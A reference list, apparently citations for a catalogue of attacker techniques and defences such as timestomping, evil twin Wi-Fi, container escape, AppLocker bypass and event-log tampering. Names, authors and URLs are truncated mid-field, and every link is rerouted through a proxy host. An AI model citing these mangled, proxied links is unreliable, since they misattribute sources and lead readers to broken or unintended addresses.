split man Torbjorn Grhttps://man7.org/linux/man-pages/man1/split.1.html
WindowsIRCarvey, H. http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
InversecosLina Lau. https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
Magnet ForMagnet Forhttps://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mi
Double Ti Matthew Du https://x.com/matthewdunwoody/status/1519846657646604289
Kaspersky eAO Kaspersk https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
medium eviGihan, Kavihttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
specter opsRyan, Gabrhttps://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-att
Australia ‘EToulas, Bil https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plan
00sec Drop0x00pico. https://0x00sec.org/t/super-stealthy-droppers/3715
S1 Custom Bunce, D. (https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/
Mandiant Kirk, N. (2 https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
S1 Old Rat Landry, J. https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/
MDSec DetMDSec Rese https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/
Microsoft Microsoft. https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load
Intezer AC Sanmillan, https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/
Stuart ELF Stuart. (2 https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
Introducin The Wover.https://thewover.github.io/Introducing-Donut/
Binary Def Binary Def https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/
Check PoinCheck Pointhttps://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-pow
Wi-Fi Pass Geeks for https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/
Malware ByHossein Jazhttps://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials
Find Wi-Fi Ruslana Li https://mackeeper.com/blog/find-wi-fi-password-on-mac/
BleepingCoSergiu Gatlhttps://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent
Intezer Re Joakim Kenhttps://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-natio
Sans MutexLenny Zeltshttps://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
ICS MutexeLenny Zelt https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
Microsoft Microsoft. https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
Deep Insti Shaul Vilk https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
Linux Sign Linux man-p https://man7.org/linux/man-pages/man7/signal.7.html
nohup Lin Meyering, Jhttps://linux.die.net/man/1/nohup
Microsoft Microsoft. https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_va
Container 0xn3va. (n.https://0xn3va.gitbook.io/cheat-sheets/container/escaping
Windows Se Daniel Pri https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/
Docker OveDocker. (n.https://docs.docker.com/get-started/overview/
Docker BinDocker. (n.https://docs.docker.com/storage/bind-mounts/
Trend MicrFiser, D., https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-b
Intezer DokFishbein, Nhttps://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-th
CrowdstrikManoj Ahuje https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exp
Keyctl-unmMark Mannin https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-ke
Shortcut foElastic. (n https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#s
BSidesSLC 2French, D.,https://www.youtube.com/watch?v=nJ0UsyiUEqQ
ESET GrandESET. (202 https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
Black Hills Bullock, B. https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
Google WorGoogle. (n.https://support.google.com/a/answer/166870?hl=en
Microsoft Microsoft. https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-
Microsoft gMicrosoft. https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/ge
Joe Sec N Joe Securi https://www.joesecurity.org/blog/3660886847485093803
Joe Sec Tri Joe Securithttps://www.joesecurity.org/blog/498839998833561473
ISACA Malw Kolbitsch, https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malw
Revil Inde Loman, M. https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attac
e
Netskope NMalik, A. ( https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
Twitter CMCarr, N. (2 https://x.com/ItsReallyNick/status/958789644165894146
Microsoft Microsoft. https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10
MSitPros Moe, O. (2 https://msitpros.com/?p=3960
GitHub UltMoe, O. (20https://github.com/api0cradle/UltimateAppLockerByPassList
Endurant CSeetharama http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Twitter CMTyrer, N. ( https://x.com/NickTyrer/status/958450014111633408
Slideshare Duarte, H.,https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219
SSHjack Bl Adam Boilea https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf
Clockwork Beuchler, https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking
Breach PosHodgson, M https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
Disable_Widmcxblue.https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-d
def_ev_winChandel, R https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
EventLog_CCore Technhttps://www.coretechnologies.com/blog/windows-services/eventlog/
Audit_Poli Daniel Simphttps://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-po
Windows Lo Franklin Smhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/
disable_wiHeiligenstehttps://ptylu.github.io/content/report/report.html?report=25
auditpol Jason Geren https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol
winser19_fNaceri, A. https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/14573160291143270
T1562.002redcanarychttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Advanced_s Simpson, D.https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audi
auditpol.e STRONTIC. https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.htm
(
evt_log_tasvch0st. (2 https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335
Medium Det French, D. https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
TechNet R Microsoft. https://technet.microsoft.com/en-us/library/cc787851.aspx
Microsoft Microsoft. http://support.microsoft.com/kb/314984
Windows Ev Payne, J. https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forw
Lateral MoPayne, J. ( https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-gr
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Server_Message_Block
Rhino LabsRhino Labshttps://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
Rhino LabsRhino Labshttps://github.com/RhinoSecurityLabs/ccat
SSH TunnelSSH.COM. (https://www.ssh.com/ssh/tunneling
BleepingC Gatlan, S. https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via
Microsoft M. (n.d.). https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
TrendMicroMercês, F. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.
TrendMicroBernardino,https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attach
Palo Alto Grunzweig,https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-disco
RFC1918 IETF Networ https://tools.ietf.org/html/rfc1918
Dell TG-33 Dell Securehttps://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
MalwarebyJérôme Seghttps://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-p
Dragos HerKent Backmhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/
Intezer AppPaul Litvak https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microso
Graeber 2 Graeber, M. http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/dn408187.aspx
TechNet AuMicrosoft. https://technet.microsoft.com/en-us/library/dn487457.aspx
NIST AutheNIST. (n.d. https://csrc.nist.gov/glossary/term/authentication
NIST MFA NIST. (n.d. https://csrc.nist.gov/glossary/term/multi_factor_authentication
D3SecutritBanerd, W.https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
OPM Leak Cybersecurhttps://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incid
Detectify SDetectify. https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
GitHub truDylan Ayreyhttps://github.com/dxa4481/truffleHog
GrimBlog GrimHackerhttps://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
Register U McCarthy, https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
K
GitHub GitMichael Hen https://github.com/michenriksen/gitrob
CNET LeaksNg, A. (201https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
Obsidian S Noah Corrahttps://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
Forbes Git Sandvik, R.https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-crede
Register DeThomson, I.https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
Huntress BCarvey, H. https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
change_rdpThe DFIR Rhttps://x.com/TheDFIRReport/status/1498657772254240768
DOJ GRU InMueller, R.https://www.justice.gov/file/1080281/download
Entrust En Entrust Da http://www.entrust.net/knowledge-base/technote.cfm?tn=8165
GitHub SIPGraeber, Mhttps://github.com/mattifestation/PoCSubjectInterfacePackage
SpectorOpsGraeber, Mhttps://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
Microsoft CHudek, T. (https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files
Microsoft AMicrosoft. https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd94
Microsoft Microsoft. https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn31
Microsoft Microsoft. https://msdn.microsoft.com/library/ms537359.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx
EduardosBlNavarro, E.https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-a
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Man-in-the-browser
Cobalt Stri Mudge, R. (https://www.cobaltstrike.com/help-browser-pivoting
cobaltstri Strategic C https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf
Apple Remo Apple. (n.dhttps://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf
Remote MApple. (n. https://support.apple.com/en-us/HT209161
Kickstart Apple. (n.dhttps://support.apple.com/en-us/HT201710
Lockboxx Dan Borgeshttp://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html
FireEye 20 Jake Nicasthttps://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and
TechNet ReMicrosoft. https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
SSH SecureSSH.COM. (n https://www.ssh.com/ssh
Azure AD CAdam Chest https://blog.xpnsec.com/azuread-connect-for-redteam/
AADInternaDr. Nestorihttps://o365blog.com/post/on-prem_admin/
MagicWebMicrosoft https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-
Azure AD HMicrosoft. https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn
Mandiant AMike Burnshttps://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
OWASP VulOWASP. (n.https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vuln
Microsoft Microsoft. https://github.com/Azure/azure-powershell
Shodan Shodan. (n.https://shodan.io
DigitalSha Swisscom &https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exp
Electron 3 Alanna Titthttps://www.kaspersky.com/blog/electron-framework-security-issues/49035/
Electron SeElectronJS.https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules
Electron 6-Kosayev, U.https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Electron 1 TOM ABAI.https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-un
(
Electron 2 Trend Micro https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Bas
IzyKnows aIzySec. (20 https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505
Red Hat SyJahoda, M.https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap
ESET EburyM.Léveillé,https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
Trustwave Radoslaw Zhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-ski
DCShadowDelpy, B. &https://www.dcshadow.com/
AdsecurityMetcalf, S https://adsecurity.org/?page_id=1821
GitHub DC Spencer S. https://github.com/shellster/DCSYNCMonitor
Microsoft Microsoft. https://msdn.microsoft.com/en-us/library/ms677626.aspx
ADDSecuriLucand,G. https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html
Apple DisabApple. (n.dhttps://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protec
F-Secure BF-Secure L https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
FireEye HIKGlyer, C., https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techn
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-durin
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?red
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration
GitHub TurTDL Projecthttps://github.com/hfiref0x/TDL
AppSecco Abhisek Dahttps://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b
Aqua BuildAssaf Morag https://blog.aquasec.com/malicious-container-image-docker-container-host
Docker ConDocker. (n.https://docs.docker.com/engine/api/v1.41/#tag/Container
Kubernete Kuberneteshttps://kubernetes.io/docs/concepts/workloads/controllers/
Kubeflow PThe Kubeflohttps://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
Kubernete The Kubernhttps://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/cc732643.aspx
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/cc754820.aspx
Microsoft Miroshnikov https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
SpectorOpsReitz, B. ( https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
Microsoft Russinovichhttps://docs.microsoft.com/sysinternals/downloads/reghide
Microsoft Russinovichhttps://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull
TrendMicr Santos, R. https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-regist
Methods ofPatrick Wahttps://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
launchd KeyDennis Gerhttps://www.real-world-systems.com/docs/launchdPlist.1.html
WireLurkerClaud Xiao.https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirel
LaunchDaeBradley Kem https://bradleyjkemp.dev/post/launchdaemon-hijacking/
sentinelon Stokes, Ph https://www.sentinelone.com/blog/how-malware-persists-on-macos/
Expel IO EvA. Randazzo https://expel.io/blog/finding-evil-in-aws/
AWS Head Amazon Web https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
AWS Get Pu Amazon Web https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
AWS DescriAmazon Web https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
Amazon Des Amazon. (n.https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
Google Com Google. (n.https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
Malwarebyt Vasilios Hi https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buc
GitHub Mim Jamieson O' https://github.com/putterpanda/mimikittenz
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
ProofpointProofpoint.https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaig
FireEye HaSwapnil Pathttps://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-cam
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
Microsoft Microsoft. https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
Windows NTim Hill. https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#X
CloudSploiCloudSploi https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
rfc2131 Droms, R. https://datatracker.ietf.org/doc/html/rfc2131
new_rogueIrwin, Ullr https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/
rfc3315 J. Bound, ehttps://datatracker.ietf.org/doc/html/rfc3315
dhcp_serv Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012
solution_mShoemaker,https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-a
w32.tidserSymantec. https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.
RDP HijackBeaumont,https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-trans
ESET OceanFoltýn, T. https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
Securelist Ishimaru, Shttps://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/
VirusTotal VirusTotal.https://www.virustotal.com/en/faq/
NSA Cyber NSA Cybers https://github.com/nsacyber/Mitigating-Web-Shells
Lee 2013 Lee, T., Ha https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-p
US-CERT AlUS-CERT. ( https://www.us-cert.gov/ncas/alerts/TA15-314A
Microsoft Microsoft Shttps://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/
Wald0 GuidRobbins, A.https://wald0.com/?p=179
Harmj0y AbSchroeder,https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
Harmj0y SeSchroeder,https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-hear
Chrome Roa Chrome Enthttps://support.google.com/chrome/a/answer/7349337
Kaspersky AGolubev, S.https://www.kaspersky.com/blog/browser-data-theft/27871/
Palo Alto PBar, T., Co https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/
